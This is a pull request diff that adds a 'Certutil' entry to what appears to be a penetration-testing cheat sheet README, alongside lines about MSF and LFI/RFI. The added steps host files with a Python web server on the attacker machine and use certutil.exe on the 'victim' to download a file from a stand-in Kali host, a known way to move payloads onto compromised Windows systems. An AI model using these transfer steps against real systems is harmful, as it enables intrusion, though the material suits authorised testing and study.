### PR TITLE
Added Certutil file transfer

### DIFF
--- a/README.md
+++ b/README.md
@@ -65,6 +65,14 @@ Using MSF. Start MSF before starting these steps:
 	
 	victim:
 	2. echo "base64string==" | base64 -d >> exploit.py
+	
+#Certutil
+		
+	local system:
+	1. python -m SimpleHTTPServer 80
+	
+	victim:
+	2. certutil.exe -urlcache -split -f "http://ip.for.kali.box/file-to-get.zip" name-to-save-as.zip
 
 
 LFI / RFI


### PR DESCRIPTION
Certutil.exe can be used in a basic command prompt to fetch files from a web server. It is generally installed on windows boxes by default.